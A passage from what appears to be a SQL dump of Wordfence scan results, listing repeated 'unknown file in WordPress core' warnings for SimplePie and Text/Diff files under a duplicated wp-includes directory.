wp-includes/wp-includes/SimplePie/Cache/Base.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/SimplePie/Cache/Base.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26578,1631424855,1631424855,'new','knownfile',75,'8d78aa6d4ee1052cc7a9b22abcef40bc','7b7b50fec0ba3a9b2d08de4296ee56ab','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache/DB.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/SimplePie/Cache/DB.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26579,1631424855,1631424855,'new','knownfile',75,'432f1094c247cf8e76e8d2ce415a01b0','9a00be112eab76826cb13338cfdfb3f4','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache/File.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/SimplePie/Cache/File.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26580,1631424855,1631424855,'new','knownfile',75,'096c56159bb5a4737ae42b8a61ac12e2','74855bbb42483b4035615b58b042dd14','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache/Memcache.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/SimplePie/Cache/Memcache.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26581,1631424855,1631424855,'new','knownfile',75,'ad5350270ded243b3f4fccedfb07c34f','1c93ebbae58aedb358bf8d7f388243ca','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache/Memcached.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/SimplePie/Cache/Memcached.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26582,1631424855,1631424855,'new','knownfile',75,'b07bba847b35a3afb9f5d643289e3e65','0b9d7efb460d7abd36a22b1d434a1e4f','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache/MySQL.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/SimplePie/Cache/MySQL.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26583,1631424855,1631424855,'new','knownfile',75,'9588545ef446a1aefcc2df5338ce31b0','f8e756175b18f5f7153b7656ce137b07','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache/Redis.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/SimplePie/Cache/Redis.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26584,1631424855,1631424855,'new','knownfile',75,'fe4642dbb4ef9c4bd6623fb71181cf5e','7c7079e733fc6b0fe4a2c001231c3f4e','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Cache.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/SimplePie/Cache.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26585,1631424855,1631424855,'new','knownfile',75,'327b0e72c588093fc4f6bc64cd392fdd','d396818e9e816ebfc296ddb635f559da','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Caption.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/SimplePie/Caption.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26586,1631424855,1631424855,'new','knownfile',75,'8fe246064f634c1e28bd99d5852293c1','6ac922cfd544c9b2c99f67127bf9040c','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Category.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/SimplePie/Category.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26587,1631424856,1631424856,'new','knownfile',75,'fe8711f1270c860808f597ff05cd246b','3fa9ebaf37ad2b5b16a940ce19645db3','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Content/Type/Sniffer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/SimplePie/Content/Type/Sniffer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26588,1631424856,1631424856,'new','knownfile',75,'a73d6a531351746d007770ddbe46d9ac','b8ab9752991bc5d6ff6dfbdd5047b046','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Copyright.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/SimplePie/Copyright.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26589,1631424856,1631424856,'new','knownfile',75,'fbbb06c718dd60200a7c5499ecc78b21','30d363ad260e7bdb1a253f6feed31890','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Core.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/SimplePie/Core.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26590,1631424856,1631424856,'new','knownfile',75,'e9c242eb23dbb482c1d7d22154fa4d92','1988eef491639aae938b5415e7913ac9','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Credit.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/SimplePie/Credit.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26591,1631424856,1631424856,'new','knownfile',75,'3db5206bcae2174ca74104f0be707459','e29c8fbdadf6792818db5969f0aa4743','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Decode/HTML/Entities.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/SimplePie/Decode/HTML/Entities.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26592,1631424856,1631424856,'new','knownfile',75,'cdeffbe897bdfb8de21f818e18d84fcb','a4e666482e9a47a5121382554c895aeb','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Enclosure.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/SimplePie/Enclosure.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26593,1631424856,1631424856,'new','knownfile',75,'4b87a412f4eb274fb3e95ce15137ce4f','12cc4d315b0a0379b96f0bf6bf1835fe','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Exception.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/SimplePie/Exception.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26594,1631424856,1631424856,'new','knownfile',75,'368837e91b585b9b7e691d571716329b','28cbf0d70750acc706913be178160113','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/File.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/SimplePie/File.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26595,1631424856,1631424856,'new','knownfile',75,'d97fca70829b0fa569e9196a321b9a28','9a72f532cdea9a1d7b33ecec82336502','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/HTTP/Parser.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/SimplePie/HTTP/Parser.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26596,1631424856,1631424856,'new','knownfile',75,'bd569680b52e9265d3ac7931ac0a95c0','bb1917f95eef0679069248799a8cbc79','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/IRI.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/SimplePie/IRI.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26597,1631424856,1631424856,'new','knownfile',75,'e931abb7c6db0033d4a178c117910620','9c50d6af1d57b1dcc804b2f287a8017c','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Item.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/SimplePie/Item.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26598,1631424856,1631424856,'new','knownfile',75,'51931f40dd601e83c004756d3c8eb47e','58e6e0d5fa311bd1ded0e115816638c4','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Locator.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/SimplePie/Locator.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26599,1631424856,1631424856,'new','knownfile',75,'c738b5940fdbe5470e1fe38199ed67ce','d37bbd656c4a0530f6f3a0ba50ad4ad6','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Misc.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/SimplePie/Misc.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26600,1631424857,1631424857,'new','knownfile',75,'4950dd89d27c1893e0fdc0300a1678fe','109391d2a3f99d84d21bcb3bc375055c','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Net/IPv6.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/SimplePie/Net/IPv6.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26601,1631424857,1631424857,'new','knownfile',75,'d10582cd4812ebdf423cdab2e4b2fc00','42505967ca698065fc2ea67cb305171c','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Parse/Date.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/SimplePie/Parse/Date.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26602,1631424857,1631424857,'new','knownfile',75,'92c289a8f4caf35bcd57f174b17527a9','31ea485e01471d65fd03a52ebd666dca','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Parser.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/SimplePie/Parser.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26603,1631424857,1631424857,'new','knownfile',75,'b661f0d1b27efbda467433236db62705','df5ab844c0666fc2d0feb22989cdaedb','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Rating.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/SimplePie/Rating.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26604,1631424857,1631424857,'new','knownfile',75,'54ee64668e548c15c66e3d2b23245d82','41bf0a4677238158f594716026240249','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/SimplePie/Registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26605,1631424857,1631424857,'new','knownfile',75,'d806a80d9c3c7f04d5bda58d3f31ae75','a3ef09a3e472167b8e9b6b80dbeee1ba','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Restriction.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/SimplePie/Restriction.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26606,1631424857,1631424857,'new','knownfile',75,'6dc09f3c9becf839ad1383d62c9c22ad','9177b8a2a461240fc303fcfdba2a9252','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Sanitize.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/SimplePie/Sanitize.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26607,1631424857,1631424857,'new','knownfile',75,'1c7a15f723dbf2b913d3c1707c403c90','0a2ccfb256f45458024cc8456cec6cee','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Source.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/SimplePie/Source.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26608,1631424857,1631424857,'new','knownfile',75,'57df1f33895a0729716c688636fc140d','3ced1a6cbebc33a29569552c284ff305','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/XML/Declaration/Parser.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/SimplePie/XML/Declaration/Parser.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26609,1631424857,1631424857,'new','knownfile',75,'ddf0e99b1fc414d14cddbbc17f7fdc8e','1f940f1a2d8d1cd53df357c2e4f73474','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/gzdecode.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/SimplePie/gzdecode.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26610,1631424857,1631424857,'new','knownfile',75,'0057ed563870fa6e96482e84b55729c6','ba3a7a1aa19a6bdecdb06785af8f088d','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff/Engine/native.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/Text/Diff/Engine/native.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26611,1631424857,1631424857,'new','knownfile',75,'265961a9b99d39f6fa23e35f0ed6b884','c997ae17012bba6774ef662adae6635a','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff/Engine/shell.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/Text/Diff/Engine/shell.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26612,1631424857,1631424857,'new','knownfile',75,'cf37aea025e3db3a7827a0aaad693b76','f36b0553ed95bb1742438a34931e83fb','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff/Engine/string.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/Text/Diff/Engine/string.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26613,1631424857,1631424857,'new','knownfile',75,'8d4d746967322756499d77d7ca043516','9f461b5e2ba3e3ea5ce4a8fa7f686037','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff/Engine/xdiff.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/Text/Diff/Engine/xdiff.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26614,1631424857,1631424857,'new','knownfile',75,'2026414c0012cb5c26e698f78795eac6','f703c72b98664b228f08974a282018a5','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff/Renderer/inline.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/Text/Diff/Renderer/inline.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26615,1631424857,1631424857,'new','knownfile',75,'011dc4a667f18ab41c7f9d58adbedb61','b89d6b8ceab281b553e76c2ce245b9e1','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff/Renderer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/Text/Diff/Renderer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26616,1631424858,1631424858,'new','knownfile',75,'a95fc8d0c2c98cbb1e3f6499183831e1','114c81c04376d847cf939b5082458c56','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/Text/Diff.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26617,1631424858,1631424858,'new','knownfile',75,'00c50ad8429ffde99c2291faca738e69','08a44d4ab826be8c950e6584ecc3c825','Unknown file in WordPress core: wp-includes/wp-includes/admin-bar.php','This 